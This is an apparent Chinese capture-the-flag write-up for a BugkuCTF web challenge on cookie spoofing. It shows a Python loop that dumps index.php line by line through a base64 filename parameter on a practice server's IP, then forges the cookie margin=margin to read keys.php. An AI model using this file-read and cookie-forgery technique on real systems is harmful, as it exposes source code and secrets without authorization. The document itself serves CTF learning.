cookies欺骗(WEB)

cookies欺骗(WEB)_第1张图片

url有base64。

cookies欺骗(WEB)_第2张图片

base64解密得到key.txt

https://www.sojson.com/base64.html

尝试用filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下line=2

cookies欺骗(WEB)_第3张图片

cookies欺骗(WEB)_第4张图片

出现了一行代码,试一下line=3.

cookies欺骗(WEB)_第5张图片

出现了不同的代码。

用脚本将index.php的源码读出来。

import requests
s = ''
for i in range(0,30):
	url = 'http://123.206.87.240:8002/web11/index.php?line='+str(i)+'&filename=aW5kZXgucGhw'
	s = requests.get(url)
	print(s.text)
'keys.txt',

'1' =>'index.php',

);



if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}



if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

 

构造Cookie margin=margin 然后读出来key.php即可。

cookies欺骗(WEB)_第6张图片

按照要求提交flag。

 

你可能感兴趣的:(BugkuCTF)